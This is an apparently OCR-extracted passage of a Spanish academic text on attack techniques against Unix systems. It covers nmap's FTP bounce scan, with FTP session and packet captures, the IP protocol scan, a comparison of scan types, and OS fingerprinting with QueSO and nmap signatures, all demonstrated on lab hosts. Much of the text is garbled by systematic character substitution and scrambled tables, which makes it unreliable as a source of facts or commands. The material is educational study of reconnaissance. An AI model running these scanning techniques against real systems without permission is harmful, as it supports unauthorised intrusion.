220 !i!"on BTP er@er 9=er ion 6.002.: rea7E. K.<$ mar!e"o 1 Pa >or7 require7 for mar!e"o. P#.. mar!epa 2 0 K er mar!e"o "ogge7 in. PO$T 19(416)404100404(( 200 PO$T !omman7 u!!e fu". 28.T .21 ,anJt bui"7 7ata !onne!tion: ,onne!tion refu e7. PO$T 19(416)404100404)0 200 PO$T !omman7 u!!e fu". 28.T 110 Opening #.,88 mo7e 7ata !onne!tion for J;bin;" J. 226 Tran fer !omp"ete. 221 /ou !ou"7 at "ea t aE goo7bEe.

Ca"tura *2% Ca"tura de la sesi8n FF! entre A ' B

En la Consola + se

uestran los "ar etros bsicos que @ a" ace"ta "ara

el FF! Bounce scan# ' su salida ;cuando las "recondiciones descri"tas ests dadas>. En la Ca"tura *2 se "uede ver la sesi8n FF! co "leta# tanto los co andos que ejecuta el !ort ,canner en A co o las res"uestas del servidor FF! en B.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J. de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"


Paquete Nro: (1 - Tiempo: 9.116513 8P Origen: 192.168.0.2:3+691 !%" &' 8P De tino: 192.168.0. 0:21 !(" Proto!o"o: +2* De !rip!i%n: /e3uest: *4/2 192516850510050522 Paquete Nro: (( - Tiempo: 9.116990 8P Origen: 192.168.0. 0:21 !(" &' 8P De tino: 192.168.0.2:3+691 !%" Proto!o"o: +2* De !rip!i%n: /esponse: 200 *4/2 command success6ul. ... Paquete Nro: (+ - Tiempo: 9.1(0+70 8P Origen: 192.168.0.2:3+691 !%" &' 8P De tino: 192.168.0. 0:21 !(" Proto!o"o: +2* De !rip!i%n: $eque t: 7I-2 Paquete Nro: (5 - Tiempo: 9.1((+91 8P Origen: 192.168.0. 0:20 !(" &' 8P De tino: 192.168.0.100:22 !$" Proto!o"o: 2$* De !rip!i%n: (0 > (( --890 .eq10 2en10 3..11+60 &.13 T.=13031(093 T.<$10 ... Paquete Nro: (7 - Tiempo: 9.1(671+ 8P Origen: 192.168.0.100:22 9$" &' 8P De tino: 192.168.0. 0:20 !(" Proto!o"o: T,P De !rip!i%n: (( > (0 -/-25 %$:0 .eq10 #!611 &in10 2en10 ... Paquete Nro: (9 - Tiempo: 9.16601( 8P Origen: 192.168.0. 0:21 !(" &' 8P De tino: 192.168.0.2:3+691 !%" Proto!o"o: +2* De !rip!i%n: /esponse: .21 $an;t build data connection: $onnection re6used. Paquete Nro: 30 - Tiempo: 9.166(95 8P Origen: 192.168.0.2:3+691 !%" &' 8P De tino: 192.168.0. 0:21 !(" Proto!o"o: +2* De !rip!i%n: /e3uest: *4/2 192516850510050580 Paquete Nro: 31 - Tiempo: 9.1666(1 8P Origen: 192.168.0. 0:21 !(" &' 8P De tino: 192.168.0.2:3+691 !%" Proto!o"o: +2* De !rip!i%n: /esponse: 200 *4/2 command success6ul. Paquete Nro: 3( - Tiempo: 9.166765 8P Origen: 192.168.0.2:3+691 !%" &' 8P De tino: 192.168.0. 0:21 !(" Proto!o"o: +2* De !rip!i%n: /e3uest: 7I-2 Paquete Nro: 33 - Tiempo: 9.16)))1 8P Origen: 192.168.0. 0:20 !(" &' 8P De tino: 192.168.0.100:80 !$" Proto!o"o: 2$* De !rip!i%n: (0 > )0 --890 .eq10 2en10 3..11+60 &.13 T.=13031(117 T.<$10 ... Paquete Nro: 35 - Tiempo: 9.17(133 8P Origen: 192.168.0.100:80 !$" &' 8P De tino: 192.168.0. 0:20 !(" Proto!o"o: 2$* De !rip!i%n: )0 > (0 --895 %$:0 .eq10 #!611 &in130660 2en10 3..11+60 T.=1+61953( T.<$13031(117 &.10 ... Paquete Nro: 37 - Tiempo: 9.17+05) 8P Origen: 192.168.0. 0:20 !(" &' 8P De tino: 192.168.0.100:80 !$" Proto!o"o: 2$*

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J* de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

De !rip!i%n: (0 > )0 -%$:0 .eq11 #!611 &in16660) 2en10 T.=13031(13+ T.<$1+61953( ... Paquete Nro: 39 - Tiempo: 9.17+09+ 8P Origen: 192.168.0. 0:21 !(" &' 8P De tino: 192.168.0.2:3+691 !%" Proto!o"o: +2* De !rip!i%n: /esponse: 110 4pening %-$II mode data connection 6or ;/bin/ls;. Paquete Nro: +0 - Tiempo: 9.175116 8P Origen: 192.168.0. 0:21 !(" &' 8P De tino: 192.168.0.2:3+691 !%" Proto!o"o: +2* De !rip!i%n: /esponse: 226 2rans6er complete.

Ca"tura *-% Ca"tura de tr/ico del

o ento donde el FF! ,erver B c$equea ;en no bre de A>

el estado de los "uertos 22 (cerrado( "ri ero ' O. luego (abierto( en C.

En la Ca"tura *- "uede verse una ca"tura a

s bajo nivel de c8 o se

co "orta B cuando recibe el co ando FF! :7,F% intenta establecer la cone9i8n# ' en base a eso in/or a a A del resultado. El resto de la ca"tura ;detalles de c8 o se cierran las cone9iones# ' de s> se "uede encontrar en el Ane9o B. Este ti"o de escaneo tiene en com'n con el Idle Acan )ran parte de las ventajas ! desventajas. @ueva ente# la ventaja de este ti"o de escaneo 'ace en la i "osibilidad de que C deter ine que el escaneo "roven)a de B# as) co o ta bin la no necesidad de que el "ort scanner A se ejecute con "rivilegios de ad inistrador. :a enor e desventaja de este ti"o de escaneo reside en la )ran di=icultad de encontrar un 2T4 Aerver con este CagujeroD de seguridad ; uc$o s di/)cil que encontrar un CQo bieD "ara la tcnica anterior>. Casi todos los servidores FF! conocidos $acen ;"or de/ecto ' aGn si "er iten ejecutar el co ando> un c$equeo de la direcci8n 7! del "ar etro !?<F ;veri/ican si la 7! es igual a la del cliente># i "idiendo esta co unicaci8n C,erver to ,erverD. As) ' todo# en la a'or)a es "osible C/orzarD este co "orta iento ;"er itido en el <FC>. !or eje "lo# "ara el servidor FF! de FreeB,5 O0 $a' que agregar el "ar etro C(<D a la l)nea C/t"dU/lagsD del arc$ivo &etc&de/aults&rc.con/. En otro servidor co o vs/t"d0.# dic$o "er iso sobre el co ando !?<F $a' que $abilitarlo con la l)nea de con/iguraci8n C"ortU"ro iscuousaKE,DH as) ' todo# al
O0 FreeB,5 incor"ora un servidor FF! en su so/tIare de base. Ler% $tt"%&&III./reebsd.org&doc&enU2,.7,?OO50(*&boo6s&$andboo6&netIor6(/t".$t l 0. Ls/t"d ;Ver1 Secure F-P (aemon> es uno de los servidores FF! inclu'e "or de/ecto en la s di/undidos 'a que se a'or)a de las distribuciones :inu9. Ler% $tt"%&&vs/t"d.beasts.org&

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J2 de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

utilizar vs/t"d co o 5ounce Server# el ataque /alla. Ls/t"d "arece nunca retornar un c8digo di/erente de 2.. ;?R> a "esar de que su cone9i8n al objetivo /ue rec$azada con un <,F.
220 !<s+2*d 2.0.." K.<$ anonEmou 1 P"ea e pe!ifE t'e pa >or7. P#.. ->>>u erI 2 0 2ogin u!!e fu". PO$T 19(416)404100404)0 200 PO$T !omman7 u!!e fu". ,on i7er u ing P#.=. 28.T 110 ?ere !ome t'e 7ire!torE "i ting. 226 Dire!torE en7 O5. PO$T 19(416)4041004+43( 200 PO$T !omman7 u!!e fu". ,on i7er u ing P#.=. 28.T 110 ?ere !ome t'e 7ire!torE "i ting. 226 Dire!torE en7 O5. 100 OOP.:

Ca"tura *1% ,esi8n de ataque de un servidor L,FF!5 con/igurado "ara ser vulnerable

:uego vs/t"d# al no in/or ar del /allo en su cone9i8n al "uerto *.5J ;cerrado> de la 7! *02.*JO...*..# @ a" CcreeD que dic$o "uerto est abierto# cuando en realidad est cerrado%
marcelo@saturno:~/src/nmap/bin$ ./nmap &b 192.168.0.60 192.168.0.100 &p 8051016 ?int: if Eour boun!e !an target 'o t arenJt rea!'ab"e from 'ere4 remember to u e -PN o >e 7onJt trE an7 ping t'em prior to t'e !an .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-06 (0:19 #$.T 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< )0;t!p open 'ttp 1056;t!p open un6no>n Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 1+.169 e!on7 marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - . 19(.16).0.100 -p )041056 .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-06 (0:(( #$.T 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< )0;t!p open 'ttp 1016/tcp closed un=no>n 3#, #77re : 00:0,:(9:90:(#:(D 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.+(6 e!on7

Consola O% FF! Bounce ,can a un servidor L,FF!5 ' un ,'n ,can co o "rueba del error

Co o "uede a"reciarse# aGn cuando se con/igure Ca "ro"8sitoD un servidor FF! "ara que "er ita este ti"o de cone9iones C,ervidor a ,ervidorD ;FA!># "or
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J- de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

res"eto al estndar o "or alguna necesidad en concreto# es e9tre ada ente di/)cil $o' en d)a que un escaneo de "uertos con este todo sea e/ectivo ' con/iable.

1.-.0. Escaneo de !rotocolos 7!


,i bien FC!# 25! e 7CM! son los "rotocolos que usual ente son enca"sulados "or 7!# 7! "uede dar servicio a varios "rotocolos de ca"a 1 0*. @ a" "er ite averiguar si el destino so"orta otro "rotocolo de ca"a 1# enviando "aquetes de "rueba e iterando valores en el ca "o protocol del encabezado 7!. El "a'load de los "aquetes que env)a es vac)o# 'a que en caso de que el objetivo no so"orte el "rotocolo de 7!."rotocol# deber)a res"onder con un "aquete 7CM! F'"e - Code 2 ;CProtocol Unreac ableD># que 'a es arcarlo co o CclosedDH en este caso# el co "orta iento es otivo su/iciente "ara u' si ilar al de un

25! ,can ;en que si se tiene res"uesta es "orque el "rotocolo no est dis"onible>. En caso de que no se obtenga res"uesta# o si se obtiene algo di/erente al "aquete 7CM! de C!rotocolo @o 5is"onibleD# se di/erente al c8digo 2 ;c8digos *# -# 0# *. o *-># se =iltrado ;aunque sea real ente un caso e9traBo>. :as tres e9ce"ciones son los "rotocolos 7CM!# FC! ' 25!# que co o @ a" 'a sabe c8 o anejarlas# les env)a un "a'load en su Cest) uloD "ara au entar la con/ianza de los resultados.
marcelo@saturno:~/src/nmap/bin$ -p 1-+1 -r u7o .;nmap - O 19(.16).0.60 --rea on

arca el "rotocolo co o arca al "rotocolo co o

a(ierto. !or Glti o# si se recibe otro ti"o de error 7CM! Fi"o - C2nreac$ableD

.tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-06 ((:53 #$.T 8ntere ting proto!o" on trueno 919(.16).0.60:: Not 'o>n: 36 !"o e7 proto!o" $ea on: 36 proto-unrea!'e P$OTO,O2 .T#T< .<$=8,< $<#.ON 1 open i!mp port-unrea!' ( openFfi"tere7 igmp no-re pon e 6 open t!p proto-re pon e 17 open u7p port-unrea!' +1 openFfi"tere7 ip@6 no-re pon e 3#, #77re : 00:0,:(9:#6:)0:D) 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in (6.170 e!on7

Consola 0% Eje "lo de un escaneo de !rotocolos 7! 0* !ara ver un listado de "rotocolos ' su c8digo res"ectivo # ver el arc$ivo &etc&"rotocols de cualquier ,? ti"o 2ni9# o ver% $tt"%&&III.iana.org&assign ents&"rotocol(nu bers Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J1 de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

En la consola 0 "uede verse que de los "ri eros 1* "rotocolos escaneados# la a'or)a estn cerrados ' algunos "ocos abiertos. Es interesante co "robar que 7!vJ est activado en este $ost. :a ca"tura eje "lo de este escaneo ;nG ero *1B> se la "uede encontrar junto a las de s de este ca")tulo en el Ane9o B.

1.-.*.. Fi"os de escaneo% <esu en


2na vez re"asados los ti"os de scanning dis"onibles de @ a"# "uede resu irse en la siguiente tabla co "arativa# de acuerdo a los objetivos deseables de un "ort scanner ' caracter)sticas relevantes%

@ecesidad de "oseer "er isos de usuario root o ad inistrador del ,iste a ?"erativo ;C!riv.<aID>. Lelocidad <elativa con res"ecto al resto ;CLeloc.D>02. Cun CsigilosaD o Cstealt$D es la tcnica. :a "recisi8n de los resultados. !ara qu se usa# con qu objetivo co Gn se utiliza. 4riv.Ra@ Beloc. Atealt9 4recisi-n
,i @o ,i ,i ,i ,i ,i @o ,i Media Baja Media Media Alta Media Mu' Baja Mu' Baja Baja Medio Mu' Bajo Alto Alto Medio& Bajo Alto Mu' Alto Alta Alta Media Baja Media Media Alta

Fi"o&Caract. ,'n ,can Connect ,can Ac6 ,can 4indoI ,can 25! ,can M&@ull&Fin&A as 7dle ,can FF! Bounce 7! ,can

0(jetivo
!uertos Abiertos # Cerrados ' Filtrados !uertos Abiertos # Cerrados ' Filtrados !uertos Filtrados !uertos Filtrados _ Abiertos&Cerrados !uertos 25! Cerrados o Abiertos&Filtrados !uertos FC! Cerrados !uertos Abiertos# Cerrados ' Filtrados !uertos Abiertos# Cerrados&Filtrados 5etectar "rotocolos activos de Ca"a 1

Mu' Alto Media&Baja Bajo Media

02 As) ' todo# cabe recordar que la ra"idez de/initiva de un escaneo se debe a innu erables /actores co o tr/ico# dela'# anc$o de banda# resultados de la eta"a de $ost discover'# etc. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J5 de 22O

Ca")tulo 5. ( Ca")tulo 5. ?tras Fcnicas de <econoci iento Activo

/ap6tulo . 0tras Tcnicas de Reconocimiento Activo


?tra tarea co Gn ente realizada en el in/or aci8n del objetivo# ' deter inar con la objetivo. Fanto el ,iste a ?"erativo en ejecuci8n co o qu ,o/tIare ' en qu "uerto# o ta bin qu versi8n en "articular del is o son u' i "ortantes "ara dirigir el "osible ataque ' descartar /uturos ca inos sin salida. o ento de obtener s u' /recuentada luego del escaneo de "uertos# es

a'or "recisi8n "osible qu so/tIare est corriendo en el

5.*. 5etecci8n del ,iste a ?"erativo% ?, Finger"rinting


El ,iste a ?"erativo# co o tal# brinda a las a"licaciones la trabajo de bajo nivel i "le entando los "rotocolos de red "or eje "lo Et$ernet# 7!# FC! ' 25! entre uc$os otros. a'or "arte del s co unes# co o

El FC!&7! Fingerprinting ;C$uella dactilarD de FC!&7!# ta bin lla ado C?, Finger"rintingD "or C?perating S1stem Finger"rintingD> trata de establecer qu ,iste a ?"erativo gener8 un "aquete o cierto tr/ico de red# de acuerdo a "articularidades conocidas de las di/erentes i "le entaciones de FC!&7!. :uego de este "aso# el intruso "uede buscar ataques conocidos# con/iguraciones dbiles "or de/ecto# /allos de diseBo# etc. "ara al ar ar un listado de intentos de intrusi8n a este nivel. Esto sucede "orque si bien los <FC son bastante detallados ' cubren la a'or)a de los casos que suceden en la "rctica# aun as) dejan algunas situaciones sin es"eci/icar ;"or su i "robabilidad de ocurrencia o su insigni/icancia># que di/erentes ,iste as ?"erativos i "le entan en su "ro"ia versi8n de FC!&7! a su anera. enos intentar

5.*.*. 5etecci8n Activa


:a detecci8n activa es la s antig^a de estas tcnicas# que data de *00+&*00O# cuando la $erra ienta Vue,?0- se co enz8 a "o"ularizar "or 7nternet# dada su ca"acidad de detecci8n ;relativa ente /iable> de un ,iste a ?"erativo re oto. ,i bien la "ri era versi8n de Vue,? co enz8 "or di/erenciar entre $osts
0- Vue,? actual ente no tiene sitio 4eb# 'a que el "ro'ecto est discontinuadoH sin e bargo# su c8digo /uente se "uede conseguir en $tt"%&&/t".cerias."urdue.edu&"ub&tools&uni9&scanners&queso& Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. JJ de 22O

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

ejecutando 4indoIs o :inu9# su naturaleza P!: $izo que se distribu'era C/ir asD "ara que cada vez @ a" agreg8 las

u'

r"ida ente e in ediata ente a"arecieron colaboradores a"ortando nuevas s ,?s /ueran detectados. Mu' "oco tie "o des"us todo de /unciona iento o is as ca"acidades ;en ?ctubre de *00O># ' varias $erra ientas is o tie "o "ara au entar la e/ectividad01.

s se crearon "osterior ente utilizando este co binando varios al

:a idea bsica es si ilar a la de un "ort scanner% el atacante ejecuta un so=t@are que env6a >prue(as? o paquetes >sin sentido? a un 9ost o(jetivo cu!as respuestas ;o /alta de ellas> son interpretadas como evidencia% en (usca de un patr-n de comportamiento que coincida con uno conocido de antemano% perteneciente a un Aistema 0perativo en particular . Estos "atrones ; s conocidos co o C/ir asD> "or lo general se al acenan en un arc$ivo de con/iguraci8n# al cual se "er ite acceder# odi/icar ' co "artir con el "ro'ecto original o con terceros "ara a "liar las ca"acidades de detecci8n# dado que es legible o est docu entado ' es inteligible05 ;ver Consolas *. ' **>.
marcelo@saturno:~/src/3ueso&980922$ !at que o.!onf L----------------------------------------------------------L que o.!onf bE a@ageIapo to" .org L----------------------------------------------------------L ,=.: M87: que o.!onf4@ 1.30 199);09;16 0):(6:0+ anonEmou <Dp M L----------------------------------------------------------L Pa6et Bormat: L L n a > f L n -> 0..5 -> pa6et N 9in re pon e to .4.#4B4B#4.B4P: L -> 0 1 -> !ontainO eq 911Ee 401no4-1no rep"E: L a -> 0 1 - PD $ -> !ontainO a!6 L > -> 0 1 D -> >in7o> 9 01no4 11 i4 D1'eDA@a"ue : L f -> .$#BPG/K -> ./N $.T #,5 B8N P.? GGG /// K$H<NT-ptr L L----------------------------------------------------------?...@ Q ,8.,O-8O. 11.0 0 1 1 1 .# 1 - - - ( 0 1 0 $# 3 0 0 0 $ + - - - 5 0 1 0 $# ?...@

Consola *.% Arc$ivo de /ir as de Vue,?

01 =erra ientas Activas de ?, Finger"rinting% $tt"%&&III.netIor6intrusion.co.u6&os/a.$t 05 @ a" tiene un /or ato de /ir as de ,iste as ?"erativos un tanto "articular# que est docu entado en este enlace% $tt"%&&n a".org&osdetect&osdetect(/inger"rint(/or at.$t l Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J+ de 22O

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting


A 4pen(-) ..2 BC9C/I$A 01 i 86 Bingerprint OpenC.D +.( ,"a OpenC.D F OpenC.D F +.G F genera" purpo e .<R9.P110(-10,SH,D1T7S8.$1103-10DST81$DS881$8ST.1(1: OP.9O1135C+NN.N&0NNT11SO(135C+NN.N&0NNT11SO3135C+N&0NNT11SO+135C+NN.N&0 NNT11SO5135C+NN.N&0NNT11SO6135C+NN.NNT11: &8N9&11+000S&(1+000S&31+000S&+1+000S&51+000S&61+000: <,N9$1/SDB1/ST1+0STH1+0S&1+000SO135C+NN.N&0S,,1NSR1: T19$1/SDB1/ST1+0STH1+0S.1OS#1.PSB1#.S$D10SR1: T(9$1N: T39$1N: T+9$1N: T59$1/SDB1/ST1+0STH1+0S&10S.1US#1.PSB1#$SO1S$D10SR1: T69$1N: T79$1N: K19DB1NST1BBSTH1BBSTO.10S8P213)SKN10S$8P21HS$8D1HS$8P,51HS$K,51HS$K21H S$KD1H: 8<9DB81.ST1BBSTH1BBSTO.81.S,D1.S.81.SD281.:

Consola **% Fir a de ?"enB,5 1.2 al acenada en el /or ato de @Ma" 2da generaci8n

@ a" en "articular ree "laz8 la "ri era edici8n del ,?0J a "artir de la versi8n 1.5.0+# "or un nuevo

otor de detecci8n de

otor conocido co o de su

Csegunda generaci8nD. Este gran ca bio estuvo siendo "re"arado durante alrededor de 2 aBos# 'a que el arc$ivo de /ir as que incor"oraba /ue reconstru)do desde cero. =o' @ a" "osee en la Glti a versi8n a este :a segunda generaci8n del
S@MA!U?,2T>

o ento ;1.J.> *-.1

/ir as corres"ondientes a 1+O ,?s o versiones di/erentes de ,?s0O. otor de /inger"rinting de @ a" ;Ler categoriza su evaluaci8n co "leta en 5 tests generales en donde

cada uno env)a una serie "rede/inida de "aquetes. :a res"uesta que se obtiene de cada test "er ite $acer varias ' di/erentes evaluaciones '&u obtenci8n de "ar etrosH estas evaluaciones o "ar etros se agru"an "or lo que se lla an probes dentro de un Fest. Fodos estos probes co "uestos "or sus "ar etros calculados con/or an la C$uella dactilarD de un ,? ' son los que e/ectiva ente se vuelcan en un arc$ivo de /inger"rint. @ a"# co o la a'or)a de este ti"o de $erra ientas# /o entan la is o sea re"ortado al "artici"aci8n de los usuarios i "ri iendo "or "antalla un /inger"rint que no e9ista en la base de /ir as# con la intenci8n de que el "ro'ecto junto con la identi/icaci8n de a qu ,? "ertenece.
0J !ara s in/or aci8n sobre la "ri era generaci8n del otor# que aGn sigue siendo Gtil# ver

S@MA!U?,*T ' S=ACRUEA!T# Ca". 2. 0+ Ler $tt"%&&insecure.org&st/&@ a"(1.5.(<elease.$t l 0O !ara a'or in/or aci8n de los ca bios entre las di/erentes versiones de @ a"# ver el siguiente enlace% $tt"%&&n a".org&c$angelog.$t l Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. JO de 22O

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

=e aqu) una breve enu eraci8n de los tests de ?, /inger"rinting de 2da. generaci8n realizados "or @ a" ' de la a'or)a de las evaluaciones que corre sobre las res"uestas obtenidas00 "ara obtener los "ar etros del ,?% 7. Test de Meneraci-n de N'meros de Aecuencias ;probes ,EV# ?!,# 47@ ' F*>. Bsica ente son J ,K@s ;con di/erentes co binaciones de flags> a un "uerto abierto. !ar etros ?btenidos% aE ?btenci8n de M9i o Co Gn 5eno inador en los @G eros de ,ecuencia FC! 7niciales ;o 7,@s>*.. ;M/D>. (E Clculo de la Media del au ento de los @G eros de ,ecuencia FC! 7nicial obtenidos ;IAR>. cE 7ndice de "redictibilidad de la secuencia de 7,@s obtenida ; A4>. Es la varianza de lo anterior. Esti a la di/icultad de "redecir el siguiente 7,@ de una secuencia conocida de J 7,@s. dE Evaluaci8n del algorit o de generaci8n de ,ecuencias 7!(75 "ara "aquetes FC! e 7CM! ;TI% II>. eE Booleano de ,ecuencia 7! 75 Co "artida ;AA>. ,i el destino co "arte la secuencia 7!(75 entre los "rotocolos FC! e 7CM!# este ca "o se establece en C,D# que "roviene de CS aredD# o CCo "artidaD. =E ?"ciones de FC! ;0 o 07.0#>. @ a" env)a en los "robes de este test algunas o"ciones de FC! ' aqu) se al acenan las res"uestas obtenidas. )E Fa aBo de Lentana FC! 7nicial ;H o H7.H#>. ,8lo se al acena el ta aBo de ventana del "aquete recibido "or cada probe. 9E <es"uesta ;R>% ,i el $ost res"ondi8H s8lo se al acena un CKD o C@D. iE Bits 7! de @o Frag entaci8n en "aquetes FC! e 7CM! ; D2% D2I>. ,e al acena si los "aquetes recibidos conten)an el bit en cuesti8n activado o no. jE Lalor FF: 7nicial del ca "o 7! ; T> ' su valor original esti ado ;TM>. ,e al acena el FF: de las res"uestas recibidas ;todas son CinicialesD#
00 Entre "arntesis al /inal de cada )te se encuentran los c8digos que el autor de @ a" le asign8 dentro del docu ento al que se $ace re/erencia ;S@MA!U?,2T>. *.. El @G ero de ,ecuencia FC! 7nicial o 7,@ es el valor del ca "o FC!(@G ero de ,ecuencia del "ri er "aquete ,K@_ACR que devuelve el $ost destino a un ,K@ enviado "or @ a" a un "uerto abierto. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J0 de 22O

Evaluaciones realizadas con sus resultados '&o

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

'a que este tr ino se re/iere a la res"uesta de un ,K@> ' se trata de establecer cul es el FF: realH "or lo general es la "otencia de 2 s cercana. :E @G ero de ,ecuencia FC! ;A>. 5i/erencia entre @G ero de ,ecuencia de la res"uesta ' el @G ero de ACR del ,K@ que envio @ a". !uede establecerse en cero ;Q># iguales ;A># el ACR es cualquier otro caso ;?>. lE @G ero de ACR FC! ;A>. ,i ilar al anterior "ero lo que se co "ara es la di/erencia entre el ACR de la res"uesta ' el @G ero de ,ecuencia en el ,K@ enviado "or @ a". !uede ser cero ;Q># iguales ;,># el ACR es a'or en uno ;,_># o cualquier otro caso ;?>. mE Banderas ;Flags> FC! ;2>. Este ca "o guarda las banderas FC! de la res"uesta. +. Test de Fco I/14 ;probe 7E>. Env)a 2 "aquetes 7CM! ti"o .9.O ;ec$o> con sutiles di/erencias en el encabezado 7!. Evaluaciones realizadas con sus resultados '&o !ar etros ?btenidos% aE <# 5F7# F# FP ;descri"tas anterior ente>. (E Fi"o de ,ervicio 7! ;Fo,> "ara <es"uestas 7CM! ; T0AI>. Al acena la co "araci8n de las res"uestas a los probes enviados en este Fest. cE C8digo de <es"uesta 7CM! ;/D>. Al acena la relaci8n del c8digo de res"uesta del ec$o(re"l' 7CM!. ,e su"one que es cero "ero a veces var)a. dE :ongitud de los datos "ara las res"uestas 7CM! ; DLI>. Cuando se inclu'en datos en los ec$o(request 7CM! se su"one que en el re"l' retornan igual. Este "ar etro al acena el ta aBo del re"l' ;de esta anera se sabe si es igual o no al es"erado>. ;. Test de Noti=icaci-n Fxpl6cita de /on)esti-n T/4 ;probe EC@>. Consiste en enviar un "aquete FC! con banderas de congesti8n de tr/ico FC! activadas. Evaluaciones realizadas con sus resultados '&o !ar etros ?btenidos% aE <# 5F# F# FP# 4# ? ;descri"tas anterior ente>. (E @oti/icaci8n de congesti8n e9"l)cita ;//>. Fodo este Fest de"ende de esta evaluaci8n# que tiene que ver con el anejo de los ensajes de congesti8n FC! del destino ;' de sus /lags C4< ' ECE>.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +. de 22O

a'or

a'or en uno ;A_># o

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

<. T/4 ;Probes F2 al F+>. ,e env)an J "aquetes FC! con sus resultados '&o !ar etros ?btenidos% aE <# 5F# F# FP# 4# ,# A# F# ? ;descri"tas anterior ente>.

s# con varias

co binaciones en el ca "o de o"ciones FC!. Evaluaciones realizadas

. UD4 ;Probe 2*>. Esta "rueba env)a * "aquete a un "uerto 25! cerrado# con el objetivo de recibir un 7CM! !ort 2nreac$able ' analizarlo. Evaluaciones realizadas con sus resultados '&o !ar etros ?btenidos% aE <# 5F# F# FP# F?, ;descri"tas anterior ente>. (E Fi"o de ,ervicio 7! ;T0AE corres"ondiente al "aquete recibido. cE :ongitud Fotal en encabezado 7! ;I4L>. ,8lo se lo al acenaH var)a segGn la i "le entaci8n 'a que la es"eci/icaci8n da a elegir cuntos b'tes del "aquete inicial debe devolver co o "a'load del 7CM!. dE !rueba de la longitud total en el encabezado 7! ; RI4L>. C$equea que el ca "o lengt$ del encabezado 7! contenga el valor corres"ondienteH algunas i "le entaciones generan eE Lalor del 7! 75 retornado ;RID>. =E Lalor correcto del c$ec6su ;RUL% RU/J>. 9E 7ntegridad de los datos 25! devueltos ;RUD>. Co o @ a" sabe lo que envi8 ' lo que debe recibir ;'a que est establecido "or el <FC># c$equea el "a'load 25! del !ort 2nreac$able. !ara ver un caso "rctico de la inter"retaci8n de una /ir a ' el clculo de los estos "ar etros# ver el Ane9o C en la "g. 2.-. del encabezado 7! ;RI4/J>. del encabezado 25! )E 7ntegridad de los ca "os longitud ' c$ec6su al este valor.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +* de 22O

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting


marcelo@saturno:~/src/nmap/bin$ u7o .;nmap -O 19(.16).0.30

.tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-31 17:13 #$T 8ntere ting port on !i!"on 919(.16).0.30:: Not 'o>n: 1711 !"o e7 port PO$T .T#T< .<$=8,< (1;t!p open ftp ((;t!p open ' 53;t!p open 7omain 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: )e<ice tDpe: general purpose /unning: +ree(-) 0.E 4- details: +ree(-) 0.0&(C2%. & 0.0&-2%(7C Fptime: 0.000 daDs !since Gon Gar 1 10:1 :20 2008" Net>or6 Di tan!e: 1 'op O. 7ete!tion performe7. P"ea e report anE in!orre!t re u"t at 'ttp:;;in e!ure.org;nmap; ubmit; . Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 16.73+ e!on7 marcelo@saturno:~/src/nmap/bin$

Consola *2% 5etecci8n de ,iste a ?"erativo con @Ma" N Coincidencia de /ir a "er/ecta

En la Consola *2 se "uede ver una ejecuci8n e9itosa del una detecci8n s a"ro9i ada# 'a que se "osee uno o

otor de ?,

Finger"rinting de @ a". En este caso se dan todas las condiciones necesarias "ara s "uertos abiertos ' cerrados ' la /ir a 'a e9iste en la base. En caso de que no sea tan /avorable# se le "uede "edir que establezca un "orcentaje de c$ances de acertar.

5.*.2. 5etecci8n !asiva


El /inger"rinting "asivo surgi8 all "or el aBo 2... ' uno de los "ri eros trabajos al res"ecto /ue el del equi"o =one'@et*.*#SF7@PU!A,T. Estas investigaciones co enzaron a notar di/erencias en los encabezados 7! ' FC! de los "aquetes ,K@ de inicio de cone9i8n# su/icientes co o "ara distinguir que "ertenec)an a un ,iste a ?"erativo u otro en "articular. destacadas Aip9on*.-# Fttercap*.1 ' quizs el s "o"ular# p$=*.5. 5esde entonces# s surgieron varias $erra ientas que i "le entan esta tcnica*.2# siendo las

